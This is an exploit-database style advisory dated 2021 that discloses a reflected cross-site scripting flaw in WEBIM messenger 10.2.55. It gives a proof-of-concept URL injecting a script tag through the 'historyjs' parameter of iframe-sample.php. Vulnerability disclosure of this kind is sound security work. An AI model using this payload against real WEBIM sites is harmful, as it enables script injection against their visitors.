WEBIM version 10.2.55 suffers from a cross site scripting vulnerability.
a3ec375b8ed0d10585f9993b568e369a
# Exploit Title: XSS in WEBIM <http://WEBIM.RU> web application
# Date: 10.08.2021
# Exploit Author: ASCII
# Vendor Homepage: HTTPS://WEBIM.RU
# Version: 10.2.55
# Tested on: 10.2.55
Webim messanger XSS
POC
https://[location].webim.ru/webim/iframe-sample.php?historyjs=1%27"()%26%25<acx><ScRiPt%20>alert(1)</ScRiPt>&location=test&redirected=0&webim-visitor=2&webimVisitor=1